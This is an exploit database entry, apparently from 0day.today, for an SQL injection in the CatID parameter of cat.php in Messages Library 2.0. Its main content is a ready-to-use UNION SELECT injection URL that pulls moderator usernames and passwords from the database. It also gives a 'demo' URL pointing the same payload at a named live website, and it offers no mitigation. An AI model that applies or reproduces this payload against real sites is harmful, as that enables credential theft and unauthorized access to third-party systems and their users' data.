id: 5422
date: 06/28/2009
title: Messages Library 2.0 (cat.php CatID) SQL Injection Vulnerability
author: SecurityRules
cves: 

================================================================
Messages Library 2.0 (cat.php CatID) SQL Injection Vulnerability
================================================================


+===================================================================================+
|                                                                                   |
|                                                                                   |
|        Messages Library v2.0 Cat.php SQL Injection Vulnerabilities                |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
+===================================================================================+
|                                                                                   |
| Script.: http://www.traidnt.net/vb/showthread.php?t=31814                         |
|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                  
| Exploit:                                                                          
|                                                                                                                                                                    
| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
|                                                                                   
| [+] Demo                                                                         
|                                                                                   
|                                                                                   
| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor                                                                               
|                                                                                                                                                    
+-----------------------------------------------------------------------------------+



#  0day.today [2023-03-25]  #